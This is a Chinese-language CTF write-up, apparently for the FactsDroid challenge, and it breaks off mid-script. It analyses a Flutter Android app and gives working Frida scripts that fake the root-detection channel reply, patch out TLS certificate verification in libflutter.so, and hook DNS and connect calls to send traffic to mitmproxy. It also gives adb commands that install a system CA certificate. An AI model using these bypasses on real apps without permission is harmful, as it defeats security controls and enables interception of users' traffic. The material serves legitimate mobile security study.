ONE PIECE 航海日志向着伟大航路出发https://blog-5w0.pages.dev/zh_CN绕过root与重定向app流量https://blog-5w0.pages.dev/posts/bypass-root-redirect-app-traffic/https://blog-5w0.pages.dev/posts/bypass-root-redirect-app-traffic/Android root 检测绕过与 App 流量重定向记录Wed, 03 Jun 2026 00:00:00 GMT<h1>绕过root与重定向app流量</h1> <h1>FactsDroid</h1> <p>这个挑战的目标与限制</p> <pre><code>| 目标 | 在动态流量篡改工具中拦截 FactsDroid 的 API 流量;操控显示给用户的 fact,可注入自定义内容或抑制真实 fact | | 约束 ① | 不静态修改原始 APK | | 约束 ② | 不能修改发往后端的请求 | | 约束 ③ | 后端 (`uselessfacts.jsph.pl`) 不在挑战范围内,不能利用 | | 约束 ④ | 响应操控可用 | </code></pre> <h1>对apk文件的分析</h1> <pre><code>strings lib/x86_64/libapp.so | grep -E 'uselessfacts|pinning|root|fetch|certs' aapt dump badging FactsDroid.apk </code></pre> <p>得到的信息很多</p> <pre><code>| 包名 | `com.eightksec.factsdroid` | | 框架 | Flutter(含 `lib/x86_64/libapp.so` 与 `libflutter.so`) | | API | `https://uselessfacts.jsph.pl/api/v2/facts/random` | | 钉死的证书 | `assets/flutter_assets/assets/certs/uselessfacts_jsph_pl.crt`(Let's Encrypt 颁发给 `uselessfacts.jsph.pl` 的叶证书) | | 二进制内符号 | `SecurityContext_SetTrustedCertificatesBytes`、`SecureSocket_RegisterBadCertificateCallback`、`Pinning validation likely failed`、`_fetchRandomFact`、`_checkRoot`、`Security Warning: Device appears to be rooted` | | MainActivity (Java) | 仅声明 channel 名 `com.eightksec.factsdroid/root_check`,****未注册 handler**** | </code></pre> <h2>root检测的说明</h2> <p>Jadx打开apk,mainactivity如下:</p> <p>他的内容很少,主要是继承自AbstractActivityC0004e</p> <p><img src="./images/img-01.png" alt="Image" /></p> <p>去看AbstractActivityC0004e类的实现</p> <p>负责启动 Flutter engine、加载libflutter.so、运行 Dart AOT 业务代码 libapp.so。</p> <pre><code>**package** G; **import** android.app.Activity; **import** android.content.Intent; **import** android.content.pm.PackageManager; **import** android.os.Build; **import** android.os.Bundle; **import** android.os.Trace; **import** android.util.Log; **import** android.view.View; **import** android.window.OnBackInvokedCallback; **import** io.flutter.embedding.engine.FlutterJNI; **import** java.util.Arrays; **import** java.util.HashMap; **import** java.util.Iterator; **import** java.util.List; **import** java.util.Objects; </code></pre> <p>接着看mainactivity的定义</p> <ul> <li> <p>它自己没有实现网络请求逻辑。</p> </li> <li> <p>它自己没有实现 UI 逻辑。</p> </li> <li> <p>它只留下了一个字符串字段:com.eightksec.factsdroid/root_check。</p> </li> </ul> <p>他的意义就是</p> <p>1.确认app的是从这里启动flutter</p> <pre><code>Manifest 里 launcher activity 是 com.eightksec.factsdroid.MainActivity,所以 Frida attach / adb 启动都围绕这个包和入口。 </code></pre> <p><img src="./images/img-02.png" alt="Image" /></p> <p>2.暴露root_check通道名</p> <pre><code>Dart侧会通过Flutter MethodChannel 调 Android 侧做 root 检测。但反编译里没看到 setMethodCallHandler,说明 Android侧没有正常回复。这个缺口就是后面用 Frida hook FlutterJNI.handlePlatformMessage,伪造 success(false) 的依据。 </code></pre> <p>''''</p> <p>可以把他理解成一个“命名管道”</p> <p>Flutter应用从开发角度来讲分为两层(但实际有三层,这是技术上)</p> <p>1.Dart层(Framework框架层):真正业务逻辑,比如检查root、请求API,</p> <p>更新UI。</p> <p>2.Android Java层(Embedder嵌入层):负责和系统交互,比如查/system/bin/su,调用native,返回检测结果。</p> <p>而这两层通信是会用MethodChannel。它需要一个通道名,列如:</p> <pre><code>com.eightksec.factsdroid/root_check 正常写法大概是这样: new MethodChannel( flutterEngine.getDartExecutor().getBinaryMessenger(), "com.eightksec.factsdroid/root_check" ).setMethodCallHandler((call, result) -&gt; { if (call.method.equals("isDeviceRooted")) { result.success(false); } }); </code></pre> <p>Dart 侧则可能这样调用:</p> <pre><code>final rooted = await channel.invokeMethod("isDeviceRooted"); </code></pre> <p>意思是:Dart 问 Android:“设备 root 了吗?”Android 应该回 true 或 false。</p> <p>但这个 APK 的 MainActivity 只有:</p> <pre><code>public final String f503f = "com.eightksec.factsdroid/root_check"; </code></pre> <p>没有看到类似:</p> <pre><code>setMethodCallHandler(...) </code></pre> <p>对B.a函数分析</p> <pre><code>**package** B; **import** G.G; **import** P.c; **import** P.j; **import** android.os.Build; **import** android.util.Log; **import** com.eightksec.factsdroid.MainActivity; **import** f0.h; **import** java.io.BufferedReader; **import** java.io.File; **import** java.io.InputStreamReader; **import** l0.g; **import** org.json.JSONException; **import** org.json.JSONObject; */* JADX INFO: loaded from: classes.dex */* **public** **final** */* synthetic */* **class** a **implements** j, c { */* JADX INFO: renamed from: b, reason: collision with root package name */* **public** **final** */* synthetic */* Object f0b; **public** */* synthetic */* a(Object obj) { **this**.f0b = obj; } @Override *// P.c * **public** **void** a(Object obj) { **boolean** z2 = false; **if** (obj != **null**) { **try** { z2 = ((JSONObject) obj).getBoolean("handled"); } **catch** (JSONException e2) { Log.e("KeyEventChannel", "Unable to unpack JSON message: " + e2); } } ((G) ((a) **this**.f0b).f0b).a(z2); } @Override *// P.j * **public** **void** g(C.a aVar, O.j jVar) { **boolean** zM; **boolean** z2; **boolean** z3 = true; **int** i2 = MainActivity.f502g; h.e((MainActivity) **this**.f0b, "this$0"); h.e(aVar, "call"); **if** (!h.a((String) aVar.f4c, "isDeviceRooted")) { jVar.b(); **return**; } String str = Build.TAGS; **if** (str == **null** || !g.M(str, "test-keys")) { String[] strArr = {"/system/app/Superuser.apk", "/sbin/su", "/system/bin/su", "/system/xbin/su", "/data/local/xbin/su", "/data/local/bin/su", "/system/sd/xbin/su", "/system/bin/failsafe/su", "/data/local/su", "/su/bin/su"}; **int** i3 = 0; **while** (true) { **if** (i3 &gt;= 10) { Process processExec = **null**; **try** { processExec = Runtime.getRuntime().exec(**new** String[]{"/system/bin/getprop", "ro.debuggable"}); String line = **new** BufferedReader(**new** InputStreamReader(processExec.getInputStream())).readLine(); zM = line != **null** ? g.M(line, "1") : false; processExec.destroy(); } **catch** (Throwable unused) { **if** (processExec != **null**) { processExec.destroy(); } zM = false; } **if** (!zM) { **try** { Process processExec2 = Runtime.getRuntime().exec(**new** String[]{"su"}); **if** (processExec2 != **null**) { processExec2.destroy(); } z2 = true; } **catch** (Throwable unused2) { z2 = false; } **if** (!z2) { z3 = false; } } } **else** **if** (**new** File(strArr[i3]).exists()) { **break**; } **else** { i3++; } } } jVar.c(Boolean.valueOf(z3)); } } </code></pre> <p>它检查的 root 痕迹包括:</p> <pre><code>/system/app/Superuser.apk /sbin/su /system/bin/su /system/xbin/su /data/local/xbin/su /data/local/bin/su /system/sd/xbin/su /system/bin/failsafe/su /data/local/su /su/bin/su </code></pre> <p>还有:</p> <p>Build.TAGS 是否包含 test-keys</p> <p>getprop ro.debuggable 是否为 1</p> <p>Runtime.exec("su") 是否成功</p> <p>所以我们的理解是:</p> <ol> <li> <p>Dart 层调用 root_check/isDeviceRooted</p> </li> <li> <p>Android 层进入 B.a.g()</p> </li> <li> <p>在 root 模拟器上这些检测会返回 true</p> </li> <li> <p>Dart 收到 true</p> </li> <li> <p>App 禁用 Random Fact 按钮,并触发警告:</p> </li> </ol> <p>Security Warning: Device appears to be rooted. Random fact button disabled.</p> <p><img src="./images/img-03.png" alt="Image" /></p> <p>所以后面 Frida 绕过 root 检测有两种思路:</p> <ol> <li> <p>hook B.a.g(),让它直接 result.success(false)</p> </li> <li> <p>更通用地 hook FlutterJNI.handlePlatformMessage,拦截 root_check 通道并伪造 success(false)</p> </li> </ol> <p>接着分析apk,发现</p> <p>业务代码不一定能在jadx的java里看到,因为Dart已编译到libapp.so。</p> <p><img src="./images/img-04.png" alt="Image" /></p> <pre><code>**public** b(String str, String str2, String str3, String str4, **boolean** z2) { **this**.f257c = str == **null** ? "libapp.so" : str; **this**.f258d = str2 == **null** ? "flutter_assets" : str2; **this**.f260f = str4; **this**.f259e = str3 == **null** ? "" : str3; **this**.f256b = z2; } </code></pre> <p>也就是说默认Dart AOT库就是libapp.so,默认的资源目录就是flutter_assets。</p> <p>然后它的 b(...) 方法里:</p> <pre><code>((FlutterJNI) this.f257c).runBundleAndSnapshotFromLibrary( aVar.f253a, aVar.f255c, aVar.f254b, (AssetManager) this.f258d, list ); </code></pre> <p>这个函数名非常关键:</p> <pre><code>runBundleAndSnapshotFromLibrary </code></pre> <p>意思就是:</p> <p>从 native snapshot/library 里运行 Dart 入口函数这里就说明 Java 层把执行权交给 FlutterJNI,FlutterJNI 再去跑 libapp.so 里的 Dart AOT。</p> <p>而FlutterJNI 里有 native 方法</p> <p><img src="./images/img-05.png" alt="Image" /></p> <p>所以执行链大概是:</p> <pre><code>MainActivity -&gt; AbstractActivityC0004e / FlutterActivity 逻辑 -&gt; 创建 FlutterEngine -&gt; FlutterJNI.loadLibrary / attachToNative -&gt; DartExecutor -&gt; runBundleAndSnapshotFromLibrary -&gt; libflutter.so 加载并运行 libapp.so 中的 Dart AOT 业务 </code></pre> <p>解包拿到的两个so文件含义</p> <ul> <li> <p>libflutter.so:Flutter engine、Dart runtime、BoringSSL 等运行时</p> </li> <li> <p>libapp.so:Dart 业务代码 AOT 编译后的产物</p> </li> </ul> <h2>证书验证的说明</h2> <p>现在去native层分析libapp.so</p> <p>直接用IDA打开分析是比较困难的</p> <p><img src="./images/img-06.png" alt="Image" /></p> <p>函数名随机,字符串无法交叉引用</p> <p>对于Flutter应用在发布时,会把DART代码编译成机器码</p> <p>和引擎代码一起打包到上面的两个so文件里</p> <p>而libapp.so经过AOT(ahead of time)编译而成,体积相对较小,这也就是Flutter 默认使用 Release 模式编译。在此模式下,编译工具链会自动移除代码中所有的调试信息,包括原本清晰的函数名。</p> <p>而对于Flutter应用,行业中有一个好用的开源工具-Blutter</p> <p>https://github.com/worawit/blutter#,但他只能对arm-64的文件进行操作</p> <p>windows上使用需要配好环境,然后在x64 Native Tools Command Prompt里使用</p> <p>生成的产物:</p> <p><img src="./images/img-07.png" alt="Image" /></p> <p>网络逻辑在 blutter_out/asm/facts_droid/services/api_service.dart:10:</p> <ul> <li>_fetchRandomFact() 调 ApiService.getRandomFact(),见 blutter_out/asm/facts_droid/main.dart:1279</li> </ul> <p><img src="./images/img-08.png" alt="Image" /></p> <ul> <li>getRandomFact() 先调用 _getHttpClientWithPinning(),见blutter_out/asm/facts_droid/services/api_service.dart:29</li> </ul> <p><img src="./images/img-09.png" alt="Image" /></p> <ul> <li>_getHttpClientWithPinning() 加载内置证书 assets/certs/uselessfacts_jsph_pl.crt,见 blutter_out/asm/facts_droid/services/api_service.dart:273</li> </ul> <p><strong>Dart 侧 _getHttpClientWithPinning() 从 assets/certs/uselessfacts_jsph_pl.crt 读取证书,创建 SecurityContext,并调用setTrustedCertificatesBytes() 设置可信证书。随后 HttpClient 使用这个 SecurityContext 发起 HTTPS 请求。</strong></p> <p><strong>这说明 App 不依赖 Android 系统证书库,而是只信任 APK 内置证书。即使把 Burp/mitmproxy CA 安装到系统证书中,Flutter 的dart:io HttpClient 仍可能不信任 MITM 证书,因此普通抓包会失败。只能在 在</strong>**<code>libflutter.so</code>**** 模式扫描 <strong><strong><code>ssl_verify_peer_cert</code></strong></strong> 并 patch 其入口直接返回成功。**</p> <p><img src="./images/img-10.png" alt="Image" /></p> <ul> <li>然后创建 SecurityContext 并调用 setTrustedCertificatesBytes(),见 blutter_out/asm/facts_droid/services/</li> </ul> <p>api_service.dart:314</p> <p><img src="./images/img-11.png" alt="Image" /></p> <p>到这里可以总结</p> <ol> <li> <p>Dart端 网络请求存在,并且使用 SecurityContext.setTrustedCertificatesBytes() 做 TLS pinning。</p> </li> <li> <p>Java 端有意不实现 root_check handler,使 Dart 调用因 <code>MissingPluginException</code> 走失败分支 → 默认认为 rooted → 禁用 Random Fact 按钮</p> </li> </ol> <h1>绕过root检测</h1> <p>接下来先去绕过root检测</p> <p>js脚本</p> <pre><code>/* * antiroot-channel.js — Java/Flutter side patch for FactsDroid root_check. * * The MainActivity does not register a handler for the * `com.eightksec.factsdroid/root_check` MethodChannel. The Flutter * engine therefore replies "no handler", the Dart future yields null, * and the catch-all path concludes the device is rooted. * * Hook FlutterJNI.handlePlatformMessage. For that channel send back a * synthetic StandardMethodCodec success-envelope holding `false`. * * Wire format of `StandardMethodCodec.encodeSuccessEnvelope(Boolean.FALSE)`: * byte 0: 0x00 (success tag) * byte 1: 0x02 (StandardMessageCodec value type for `false`) * * We build that 2-byte envelope ourselves because the Flutter codec * helper class is stripped by ProGuard in release builds of this app. */ console.log('[chan] antiroot-channel loading'); function patch() { Java.perform(function () { var FlutterJNI; try { FlutterJNI = Java.use('io.flutter.embedding.engine.FlutterJNI'); } catch (e) { console.log('[chan] FlutterJNI not yet loaded'); return false; } var ByteBuffer = Java.use('java.nio.ByteBuffer'); FlutterJNI.handlePlatformMessage.overload( 'java.lang.String', 'java.nio.ByteBuffer', 'int', 'long' ).implementation = function (channel, message, replyId, messageData) { if (channel === 'com.eightksec.factsdroid/root_check') { console.log('[chan] root_check inbound (replyId=' + replyId + ')'); try { // success(false): tag byte 0x00, then StandardMessageCodec false = 0x02 var buf = ByteBuffer.allocateDirect(2); buf.put(0x00); buf.put(0x02); this.invokePlatformMessageResponseCallback(replyId, buf, buf.position()); console.log('[chan] replied isRooted=false'); return; } catch (e) { console.log('[chan] reply error: ' + e); } } return this.handlePlatformMessage(channel, message, replyId, messageData); }; console.log('[chan] FlutterJNI.handlePlatformMessage hooked'); return true; }); } let chanTries = 0; const chanTimer = setInterval(function () { if (chanTries++ &gt; 80) { clearInterval(chanTimer); console.log('[chan] giving up'); return; } let loaded = false; Java.perform(function () { try { Java.use('io.flutter.embedding.engine.FlutterJNI'); loaded = true; } catch (e) {} }); if (loaded) { clearInterval(chanTimer); patch(); } }, 100); </code></pre> <p>先激活frida-server,然后先执行命令,再启动app</p> <pre><code>PS E:\ctf\8Ksec\FactsDroid.apk&gt; frida -U -W com.eightksec.factsdroid ` &gt;&gt; -l work\antiroot-channel.js ` &gt;&gt; --runtime=v8 ____ / _ | Frida 17.8.0 - A world-class dynamic instrumentation toolkit | (_| | &gt; _ | Commands: /_/ |_| help -&gt; Displays the help system . . . . object? -&gt; Display information about 'object' . . . . exit/quit -&gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Android Emulator 5554 (id=emulator-5554) Waiting for spawn to appear... Handling: Spawn(pid=2950, identifier="com.eightksec.factsdroid") [chan] antiroot-channel loading Spawned `com.eightksec.factsdroid`. Resuming main thread! [Android Emulator 5554::re.compile('com.eightksec.factsdroid') ]-&gt; [chan] FlutterJNI.handlePlatformMessage hooked [chan] root_check inbound (replyId=6) [chan] replied isRooted=false </code></pre> <p><img src="./images/img-12.png" alt="Image" /></p> <h1>证书校验patch</h1> <pre><code>/** A Frida script that disables Flutter's TLS verification This script works on Android x86, Android x64 and iOS x64. It uses pattern matching to find [ssl_verify_peer_cert in handshake.cc](https://github.com/google/boringssl/blob/master/ssl/handshake.cc#L323) If the script doesn't work, take a look at https://github.com/NVISOsecurity/disable-flutter-tls-verification#warning-what-if-this-script-doesnt-work */ // Configuration object containing patterns to locate the ssl_verify_peer_cert function for different platforms and architectures. var config = { "ios":{ "modulename": "Flutter", "patterns":{ "arm64": [ // First pattern is actually for macos "FF 83 01 D1 FA 67 01 A9 F8 5F 02 A9 F6 57 03 A9 F4 4F 04 A9 FD 7B 05 A9 FD 43 01 91 F4 03 00 AA 68 31 00 F0 08 01 40 F9 08 01 40 F9 E8 07 00 F9", "FF 83 01 D1 FA 67 01 A9 F8 5F 02 A9 F6 57 03 A9 F4 4F 04 A9 FD 7B 05 A9 FD 43 01 91 F? 03 00 AA ?? 0? 40 F? ?8 ?? 40 F9 ?? ?? 4? F9 ?? 00 00", "FF 43 01 D1 F8 5F 01 A9 F6 57 02 A9 F4 4F 03 A9 FD 7B 04 A9 FD 03 01 91 F3 03 00 AA 14 00 40 F9 88 1A 40 F9 15 E9 40 F9 B5 00 00 B4 B6 46 40 F9" ], }, }, "android":{ "modulename": "libflutter.so", "patterns":{ "arm64": [ "F? 0F 1C F8 F? 5? 01 A9 F? 5? 02 A9 F? ?? 03 A9 ?? ?? ?? ?? 68 1A 40 F9", "F? 43 01 D1 FE 67 01 A9 F8 5F 02 A9 F6 57 03 A9 F4 4F 04 A9 13 00 40 F9 F4 03 00 AA 68 1A 40 F9", "FF 43 01 D1 FE 67 01 A9 ?? ?? 06 94 ?? 7? 06 94 68 1A 40 F9 15 15 41 F9 B5 00 00 B4 B6 4A 40 F9", "FF ?3 01 D1 F? ?? 01 A9 ?? ?? ?? 94 ?? ?? ?? 52 48 00 00 39 1A 50 40 F9 DA 02 00 B4 48 03 40 F9", ], "arm": [ "2D E9 F? 4? D0 F8 00 80 81 46 D8 F8 18 00 D0 F8", ], "x64": [ "55 41 57 41 56 41 55 41 54 53 50 49 89 F? 4? 8B ?? 4? 8B 4? 30 4C 8B ?? ?? 0? 00 00 4D 85 ?? 74 1? 4D 8B", "55 41 57 41 56 41 55 41 54 53 48 83 EC 18 49 89 FF 48 8B 1F 48 8B 43 30 4C 8B A0 28 02 00 00 4D 85 E4 74", "55 41 57 41 56 41 55 41 54 53 48 83 EC 18 49 89 FE 4C 8B 27 49 8B 44 24 30 48 8B 98 D0 01 00 00 48 85 DB" ], "x86":[ "55 89 E5 53 57 56 83 E4 F0 83 EC 20 E8 00 00 00 00 5B 81 C3 2B 79 66 00 8B 7D 08 8B 17 8B 42 18 8B 80 88 01" ] } }, "windows": { "modulename": "flutter_windows.dll", "patterns":{ "x64":[ "41 57 41 56 41 55 41 54 56 57 53 48 83 EC 40 4? 89 CF 48 8B 05 ?? ?? ?? 00 48 31 E0 48 89 44 24 38 4? 8B 31 4? 8B", "41 57 41 56 41 55 41 54 56 57 55 53 48 83 EC 38 48 89 CF 48 8B 05 20 45 C6 00 48 31 E0 48 89 44 24 30 48 8B 31 48", ] } }, "linux":{ "modulename": "libflutter_linux_gtk.so", "patterns":{ "x64":[ // This one actually matches android x64 too "55 41 57 41 56 41 55 41 54 53 48 83 EC 18 49 89 FE 4C 8B 27 49 8B 44 24 30 48 8B 98 D0 01 00 00 48 85 DB" ] } } }; console.log("[+] Pattern version: Jan 26 2026") console.log("[+] Arch:", Process.arch) console.log("[+] Platform: ", Process.platform) // Flag to check if TLS validation has already been disabled var TLSValidationDisabled = false; var flutterLibraryFound = false; var tries = 0; var maxTries = 5; var timeout = 1000; var androidBypass = false; disableTLSValidation(); // Main function to disable TLS validation for Flutter function disableTLSValidation() { // Stop if ready if (TLSValidationDisabled) return; tries ++; if(tries &gt; maxTries &amp;&amp; !androidBypass){ console.warn(`\n`) console.warn('[!] Flutter library not found. Possible reasons:'); console.warn('[!] - The application does not use Flutter'); console.warn('[!] - The application has not loaded the Flutter library yet'); console.warn('[!] - You are using an emulator + gadget (https://github.com/NVISOsecurity/disable-flutter-tls-verification/issues/43)'); console.warn('[!] The script will continue, but is likely to fail'); console.warn(`\n`) androidBypass = true; }else{ // No module found yet if(m == null){ if(androidBypass){ // But we are in bypass mode and are looking for the ssl_verify_peer_certy anyway console.log(`[ ] Locating ssl_verify_peer_cert (${tries}/${maxTries})`) } else{ // Still looking for flutter lib console.log(`[ ] Locating Flutter library ${tries}/${maxTries}`); } } else { // Module has been located console.log(`[ ] Locating ssl_verify_peer_cert (${tries}/${maxTries})`) } } // Figure out which patterns to use var platformConfig = {} if(Java.available){ platformConfig = config["android"] } else if(Process.platform === 'darwin'){ platformConfig = config["ios"] } else if(Process.platform in config){ platformConfig = config[Process.platform] } else{ console.log(`[!] Platform not supported: ${Process.platform}`) } var m = Process.findModuleByName(platformConfig["modulename"]); if (m === null &amp;&amp; !androidBypass) { setTimeout(disableTLSValidation, timeout); return; } else{ if(!androidBypass){ console.log(`[+] Flutter library located`) } // reset counter so that searching for ssl_verify_peer_cert also gets x attempts if(flutterLibraryFound == false){ flutterLibraryFound = true; tries = 0; } } if (Process.arch in platformConfig["patterns"]) { var ranges; if(Java.available){ // On Android, getting ranges from the loaded module is buggy, so we revert to Process.enumerateRanges ranges = Process.enumerateRanges({protection: 'r-x'}).filter(isFlutterRange) }else{ // On iOS, there's no issue ranges = m.enumerateRanges('r-x') } findAndPatch(ranges, platformConfig["patterns"][Process.arch], Java.available &amp;&amp; Process.arch == "arm" ? 1 : 0); } else { console.log('[!] Processor architecture not supported: ', Process.arch); } if (!TLSValidationDisabled) { if (tries == maxTries) { if(androidBypass){ console.warn(`\n`) console.warn(`[!] No function matching ssl_verify_peer_cert could be found.`) console.warn(`[!] If you are sure that the application is using Flutter, please open an issue:`) console.warn(`[!] https://github.com/NVISOsecurity/disable-flutter-tls-verification/issues`) console.warn(`\n`) }else{ console.warn(`\n`) console.error(`[!] libFlutter was found, but ssl_verify_peer_cert could not be located`) console.error(`Please open an issue at https://github.com/NVISOsecurity/disable-flutter-tls-verification/issues`); console.warn(`\n`) } // Not really, but we give up TLSValidationDisabled = true } } } // Find and patch the method in memory to disable TLS validation function findAndPatch(ranges, patterns, thumb) { ranges.forEach(range =&gt; { patterns.forEach(pattern =&gt; { var matches = Memory.scanSync(range.base, range.size, pattern); matches.forEach(match =&gt; { var info = DebugSymbol.fromAddress(match.address) if(info.name){ console.log(`[+] ssl_verify_peer_cert found at offset: ${info.name || match.address}`); }else{ console.log(`[+] ssl_verify_peer_cert found at location: ${match.address}`); } TLSValidationDisabled = true; hook_ssl_verify_peer_cert(match.address.add(thumb)); console.log('[+] ssl_verify_peer_cert has been patched') }); if(matches.length &gt; 1){ console.log('[!] Multiple matches detected. This can have a negative impact and may crash the app. Please open a ticket') } }); }); // Try again. disableTLSValidation will not do anything if TLSValidationDisabled = true setTimeout(disableTLSValidation, timeout); } function isFlutterRange(range){ if(androidBypass) return true; var address = range.base var info = DebugSymbol.fromAddress(address) if(info.moduleName != null){ if(info.moduleName.toLowerCase().includes("flutter")){ return true; } } return false; } // Replace the target function's implementation to effectively disable the TLS check function hook_ssl_verify_peer_cert(address) { Interceptor.replace(address, new NativeCallback((pathPtr, flags) =&gt; { return 0; }, 'int', ['pointer', 'int'])); } </code></pre> <p>执行</p> <pre><code>PS E:\ctf\8Ksec\FactsDroid.apk&gt; frida -U -W com.eightksec.factsdroid ` &gt;&gt; -l E:\ctf\8Ksec\FactsDroid.apk\work\antiroot-channel.js ` &gt;&gt; -l E:\ctf\8Ksec\FactsDroid.apk\work\disable-flutter-tls.js ` &gt;&gt; --runtime=v8 ____ / _ | Frida 17.8.0 - A world-class dynamic instrumentation toolkit | (_| | &gt; _ | Commands: /_/ |_| help -&gt; Displays the help system . . . . object? -&gt; Display information about 'object' . . . . exit/quit -&gt; Exit . . . . . . . . More info at https://frida.re/docs/home/ . . . . . . . . Connected to Android Emulator 5554 (id=emulator-5554) Waiting for spawn to appear... Handling: Spawn(pid=3215, identifier="com.eightksec.factsdroid") [chan] antiroot-channel loading [+] Pattern version: Jan 26 2026 [+] Arch: x64 [+] Platform: linux [ ] Locating Flutter library 1/5 Spawned `com.eightksec.factsdroid`. Resuming main thread! [Android Emulator 5554::re.compile('com.eightksec.factsdroid') ]-&gt; [chan] FlutterJNI.handlePlatformMessage hooked [chan] root_check inbound (replyId=6) [chan] replied isRooted=false [ ] Locating Flutter library 2/5 [+] Flutter library located [+] ssl_verify_peer_cert found at offset: 0x7c4c99 [+] ssl_verify_peer_cert has been patched </code></pre> <h1>让App连接到我的Burp/mitmproxy</h1> <p>接下来要解决的是怎么让App连接到我的Burp/mitmproxy</p> <p>之前静态分析拿到的</p> <p>host: uselessfacts.jsph.pl</p> <p>path: /api/v2/facts/random</p> <p>后续只需要处理这个请求</p> <p>https://uselessfacts.jsph.pl/api/v2/facts/random</p> <p>然后把域名流量导向我的代理,因为 Flutter 的 dart:io HttpClient 不稳定依赖 Android 系统代理,所以报告里采用:/system/etc/hosts把:uselessfacts.jsph.pl解析到你的 Windows 主机 IP。</p> <p>这里用的是mitmproxy,先生成CA文件</p> <pre><code>mitmdump --listen-port 38080 -q &amp; sleep 5; kill $! </code></pre> <p>启动一次 mitmproxy,监听 38080,-q 是安静模式。</p> <p>计算Android的证书名</p> <pre><code>HASH=$(openssl x509 -inform PEM -subject_hash_old -in ~/.mitmproxy/mitmproxy-ca-cert.pem -noout) </code></pre> <p>复制成 Android 要求的名字</p> <pre><code>cp ~/.mitmproxy/mitmproxy-ca-cert.pem /tmp/$HASH.0 </code></pre> <p>推送到手机/模拟器</p> <pre><code>adb push /tmp/$HASH.0 /sdcard/ </code></pre> <p>复制到系统证书目录</p> <pre><code>adb shell "su -c 'mount -o rw,remount /; cp /sdcard/$$HASH.0 /system/etc/security/cacerts/; chmod 644 /system/etc/security/cacerts/$$HASH.0'" </code></pre> <p>其实证书安装是为了兼容一下</p> <p>两个重要的脚本</p> <p>mitm-redirect.js 的作用是:让 App 的网络连接先走到你本机 mitmproxy</p> <pre><code>/* * mitm-redirect.js — Selective MITM redirect for FactsDroid (Flutter app). * * Goal: route only `uselessfacts.jsph.pl` traffic through the local * mitmproxy reverse listener, leaving everything else (Google Fonts, * etc.) alone — and defeat Flutter's BoringSSL cert pinning. * * Mechanism: * 1. Hook getaddrinfo() and resolve `uselessfacts.jsph.pl` to MITM_HOST. * 2. Hook connect(); if the target == MITM_HOST and port == 443, * rewrite the port to MITM_PORT. * 3. Load companion script disable-flutter-tls.js to neutralise the * Flutter cert-pinning check. * * Constraint compliance: * - We do not change any bytes the app *sends*. SNI, Host header, and * request body are exactly what the app would have transmitted to * the real backend; only the destination IP/port are rewritten so * mitmproxy in reverse-mode can interpose. */ const TARGET_HOST = "uselessfacts.jsph.pl"; const MITM_HOST = "192.168.124.18"; // host where mitmdump listens const MITM_PORT = 443; // mitmproxy reverse-mode port function ipToBytes(ip) { return ip.split('.').map(b =&gt; parseInt(b, 10) &amp; 0xff); } const MITM_BYTES = ipToBytes(MITM_HOST); function readSockaddrFamily(p) { try { if (!p || p.isNull()) return 0; const family = p.readU16(); return (family === 2 || family === 10) ? family : 0; } catch (e) { return 0; } } function findAiAddr(ai) { // Android/Bionic and glibc place ai_addr/ai_canonname differently on // 64-bit builds. Pick the pointer that actually references a sockaddr. const candidates = Process.pointerSize === 8 ? [24, 32] : [20, 24]; for (const off of candidates) { try { const p = ai.add(off).readPointer(); const family = readSockaddrFamily(p); if (family !== 0) return { ptr: p, off: off, family: family }; } catch (e) {} } return null; } function findExport(modName, sym) { // Frida 17 deprecates Module.findExportByName(null, sym). if (typeof Module.getGlobalExportByName === 'function') { try { return Module.getGlobalExportByName(sym); } catch (e) {} } if (modName) { try { return Module.getExportByName(modName, sym); } catch (e) {} } for (const m of Process.enumerateModules()) { try { const p = Module.getExportByName(m.name, sym); if (p &amp;&amp; !p.isNull()) return p; } catch (e) {} } return null; } // ----- 1. hook getaddrinfo to coerce DNS for the target host ----- function hookGetaddrinfo() { const gai = findExport(null, 'getaddrinfo'); if (!gai) { console.log('[mitm] getaddrinfo not found'); return; } Interceptor.attach(gai, { onEnter: function (args) { this.host = args[0].isNull() ? null : args[0].readUtf8String(); this.res = args[3]; }, onLeave: function (retval) { if (retval.toInt32() !== 0) return; if (!this.host || this.host !== TARGET_HOST) return; // Walk the addrinfo* linked list at *res, replace each sockaddr. let p = this.res.readPointer(); while (!p.isNull()) { // struct addrinfo: int flags; int family; int socktype; // int protocol; socklen_t addrlen; // struct sockaddr *addr; // char *canonname; // struct addrinfo *next; const aiAddr = findAiAddr(p); const addrPtr = aiAddr ? aiAddr.ptr : ptr(0); const family = aiAddr ? aiAddr.family : p.add(4).readInt(); // sockaddr_in: family(2) port(2) addr(4) if (family === 2 &amp;&amp; !addrPtr.isNull()) { // keep port; rewrite v4 address p.add(4).writeInt(2); for (let i = 0; i &lt; 4; i++) addrPtr.add(4 + i).writeU8(MITM_BYTES[i]); } else if (family === 10 &amp;&amp; !addrPtr.isNull()) { // Convert IPv6 results into IPv4 sockaddr_in results. Keeping an // AF_INET6 family with an IPv4-mapped address can bypass the simple // IPv4 connect() rewrite and may not hit a Windows IPv4 listener. p.add(4).writeInt(2); // ai_family = AF_INET p.add(16).writeU32(16); // ai_addrlen = sizeof(sockaddr_in) addrPtr.writeU16(2); // sockaddr.sa_family = AF_INET for (let i = 0; i &lt; 4; i++) addrPtr.add(4 + i).writeU8(MITM_BYTES[i]); } p = p.add(Process.pointerSize === 8 ? 40 : 32).readPointer(); // ai_next offset } console.log(`[mitm] getaddrinfo("${this.host}") -&gt; ${MITM_HOST}`); } }); console.log('[mitm] getaddrinfo hook installed'); } // ----- 2. hook connect to remap port 443 -&gt; MITM_PORT for MITM_HOST ----- function hookConnectSymbol(sym) { const connectPtr = findExport('libc.so', sym); if (!connectPtr) return false; Interceptor.attach(connectPtr, { onEnter: function (args) { const sa = args[1]; if (sa.isNull()) return; const family = sa.readU16(); if (family === 2) { const port = ((sa.add(2).readU8() &lt;&lt; 8) | sa.add(3).readU8()) &amp; 0xffff; const ip = `${sa.add(4).readU8()}.${sa.add(5).readU8()}.${sa.add(6).readU8()}.${sa.add(7).readU8()}`; if (port === 443) console.log(`[mitm] ${sym}() IPv4 ${ip}:${port}`); if (ip === MITM_HOST &amp;&amp; port === 443) { sa.add(2).writeU8((MITM_PORT &gt;&gt; 8) &amp; 0xff); sa.add(3).writeU8(MITM_PORT &amp; 0xff); console.log(`[mitm] ${sym}() ${ip}:443 -&gt; ${MITM_HOST}:${MITM_PORT}`); } } else if (family === 10) { const port = ((sa.add(2).readU8() &lt;&lt; 8) | sa.add(3).readU8()) &amp; 0xffff; if (port === 443) { const mapped = sa.add(8).readU8() === 0 